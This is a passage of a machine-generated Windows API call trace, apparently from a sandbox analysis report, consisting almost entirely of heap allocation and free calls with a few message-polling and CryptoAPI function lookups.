RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0253.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0253.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0253.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0253.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0253.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0253.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0253.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0253.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0253.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0253.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0253.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0253.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0253.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0253.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.521] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0253.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0253.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69be8 [0253.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69be8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0253.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0253.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0253.522] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0253.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0253.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0253.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0253.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0253.522] CryptDestroyHash (hHash=0xa86f90) returned 1 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0253.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0253.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0253.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0253.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0253.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0253.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0253.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0253.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0253.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0253.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0253.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0253.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0253.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0253.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0253.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0253.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0253.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0253.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0253.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0253.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.527] RtlAllocateHeap 